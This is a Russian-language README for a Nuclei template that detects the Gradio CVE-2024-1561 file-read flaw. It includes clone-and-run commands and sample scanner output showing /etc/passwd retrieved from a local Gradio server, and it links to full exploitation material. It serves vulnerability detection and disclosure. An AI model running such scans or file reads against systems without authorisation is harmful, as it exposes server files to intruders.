
Nuclei Templates
Этот шаблон Nuclei предназначен для обнаружения уязвимости Gradio CVE-2024-1561 в веб-приложениях. Gradio — это библиотека Python для создания настраиваемых компонентов пользовательского интерфейса для моделей машинного обучения. Данная уязвимость может позволить злоумышленникам читать файлы с сервера.
Клонируйте этот репозиторий на локальную машину и запустите с флагом -t:
git clone https://github.com/DiabloHTB/Nuclei-Template-CVE-2024-1561
cd Nuclei-Template-CVE-2024-1561
nuclei -target <URL> -t CVE-2024-1561.yaml
Пример:
┌──(gradio-env)─(diablo㉿diablo)-[~/gradio]
└─$ nuclei -target http://127.0.0.1:7860 -t CVE-2024-1561.yaml
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.2.6
projectdiscovery.io
[INF] Current nuclei version: v3.2.6 (outdated)
[INF] Current nuclei-templates version: v9.8.6 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 65
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2024-1561] [http] [high] http://127.0.0.1:7860/file=/tmp/gradio/83bbb89b677a9cca3d271a392fa1aa2a10853c32/passwd
Шаблон проверяет наличие /etc/passwd с совпадением пользователя root.
Для полной эксплуатации цели проверьте следующее:
https://huntr.com/bounties/4acf584e-2fe8-490e-878d-2d9bf2698338
https://github.com/DiabloHTB/CVE-2024-1561
Отказ от ответственности
Этот шаблон предоставляется только в образовательных и информационных целях. Использование этого шаблона для атак на цели без предварительного взаимного согласия является незаконным. Пользователь несет ответственность за соблюдение всех применимых местных, государственных и федеральных законов. Разработчики не несут ответственности за любое неправильное использование или ущерб, причиненный этим шаблоном.